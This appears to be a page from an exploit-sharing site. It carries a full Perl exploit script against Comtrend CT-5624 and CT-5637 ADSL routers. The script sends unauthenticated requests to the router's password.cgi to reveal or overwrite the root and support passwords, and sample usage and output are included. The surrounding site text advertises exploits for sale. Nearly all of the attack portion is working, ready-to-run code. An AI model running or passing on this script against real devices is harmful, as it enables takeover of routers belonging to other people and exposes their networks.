0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Comtrend Router CT-5624 Remote Root/Support Password Disclosure
#!/usr/bin/perl # # [+] Comtrend Router CT-5624 Remote Root/Support Password Disclosure/Change Exploit # # Author: Todor Donev # Email: todor.donev@@gmail # Type: Hardware # Vuln Type: Remote # # Tested: # Board ID : CT-5624 # Software : A011-306TSR-C01_R03 # Bootloader : 1.0.37-0.7-3 # ADSL : A2pB022c3.d20e # # Board ID : CT-5637 # Software : A111-312BTC-C01_R12 # Bootloader : 1.0.37-12.1-1 # ADSL : A2pB023k.d20k_rc2 # ##### # CT-5624 ADSL2+ Ethernet Router # The CT-5624 series ADSL2+ compact and high performance Ethernet router # provides four 10/100 Ethernet Interfaces, and one ADSL line interface # to access the Internet, incorporating LAN or Video on Demand over one # ordinary telephone line, at speeds of up to 24 Mbps. It also has full # routing capabilities to segment/route IP protocol, and supports advanced # security functions. ##### # # playground$ perl comtrend.pl -c 192.168.1.1:80 # [+] Comtrend CT5624 Router Remote Root/Support Password Disclosure/Change Exploit # [!] Target: 192.168.1.1:80 # [o] New root password: root31337 # [o] New support password: sup31337 # [*] Successfully !! ## # playground$ perl comtrend.pl -d 192.168.1.1:80 # [+] Comtrend CT5624 Router Remote Root/Support Password Disclosure/Change Exploit # [!] Target: 192.168.1.1:80 # [o] root: root31337 # [o] support: sup31337 ## # playground$ perl comtrend.pl # [+] Comtrend CT5624 Router Remote Root/Support Password Disclosure/Change Exploit # [!] usg: perl comtrend.pl [-c or -d] <victim> # [!] -d: Disclosure Root/Support password # [!] -c: Change Root/Support password # ##### # Thanks to Tsvetelina Emirska # for the help and support which gives me =) ##### use LWP::Simple; print "[+] Comtrend CT5624 Router Remote Root/Support Password Disclosure/Change Exploit\n"; if (@ARGV == 0) {&usg;} while (@ARGV > 0) { $type = shift(@ARGV); $t = shift(@ARGV); if ($type eq "-d") { my $r = get("http://$t/password.cgi") or die("suck!"); print "[!] Target: $t\n"; if ($r =~ m/pwdAdmin = '(.*)';/g) { $result .= "[o] root: $1\n"; } if ($r =~ m/pwdSupport = '(.*)';/g) { $result .= "[o] support: $1\n"; print $result; }}} if ($type eq "-c") { print "[!] Target: $t\n"; print "[o] New root password: "; my $rootpass=<STDIN>; chomp($rootpass); print "[o] New support password: "; my $suppass=<STDIN>; chomp($suppass); my $r = get("http://$t/password.cgi?sysPassword=$rootpass&sptPassword=$suppass") or die("suck!"); if ($r =~ m/pwdAdmin = '$rootpass';/g) { print "[*] Successfully !!\n"; }} sub usg(){ print "[!] usg: perl comtrend.pl [-c or -d] <victim>\n"; print "[!] -d: Disclosure Root/Support password\n"; print "[!] -c: Change Root/Support password\n"; exit; } # 0day.today [2024-12-24] #